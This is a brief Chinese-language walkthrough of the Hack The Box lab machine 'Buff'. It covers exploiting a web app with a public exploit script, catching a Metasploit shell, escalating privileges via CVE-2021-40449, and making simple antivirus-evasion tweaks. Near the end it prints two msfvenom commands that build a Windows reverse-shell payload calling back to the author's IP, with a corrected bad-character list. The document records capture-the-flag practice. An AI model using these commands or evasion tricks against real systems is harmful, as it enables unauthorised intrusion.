HTB buff wp

bfa-hawk / 2024-10-11 / 原文

难度：easy

初步端口扫描：

开了两个端口，7680没有什么信息，8080是web服务，进去看一下，在concat.php发现版本信息

searchsploit搜一下，发现payload，选用48506这个脚本

修改一下脚本，不用他给的交互式shell（太难用了），在写入的php文件中加入文件上传功能，弹回来个shell，用msf收一下

直接用multi/recon/local_exploit_suggester提权

利用cve_2021_40449可以提权成功

后续
有师傅跟我说打的时候发现有杀软：

因为我一开始直接用的meterpreter的payload，直接绕过了没有感觉，一种方式就是用meterpreter的payload，一种方式是用nc弹回来，第三种方式是对shell_reverse_tcp这个payload进行简单的免杀：

加个编码参数后就能传上去，没有免杀的payload如果通过web传上去机器会直接卡死

后续看了官方的wp，复现了一下发现官方给的wp还是有点小坑
首先用chisel把端口代理出来，官方的wp很详细，不多赘述，具体讲一下坑在哪
官方的命令是：
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=4444 EXITFUNC=thread -b "\x00\x0d\x0a" -f python
这样子shell回不来，坏字符没处理干净，命令替换成
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.21 LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d\x25\x26\x2b\x3d" -f python
这样生成的shellcode替换exp里的shellcode后可以正常使用